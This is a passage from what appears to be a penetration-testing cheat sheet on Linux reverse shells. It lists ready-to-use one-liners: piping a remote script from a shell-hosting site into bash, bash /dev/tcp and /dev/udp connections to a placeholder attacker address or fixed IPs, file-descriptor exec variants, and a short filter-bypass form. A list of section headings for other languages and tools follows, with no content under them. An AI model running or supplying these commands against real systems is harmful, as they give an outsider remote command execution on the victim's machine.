Reverse Shells - Linux
Full TTY
Bash | sh
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
#Short and bypass (credits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell to get the output to execute
exec >&0Symbol safe shell
Shell explanation
Create in file and execute
Forward Shell
Netcat
gsocket
Telnet
Whois
Python
Perl
Ruby
PHP
Java
Ncat
Golang
Lua
NodeJS
OpenSSL
Socat
Bind shell
Reverse shell
Awk
Finger
Gawk
Xterm
Groovy
References
Last updated

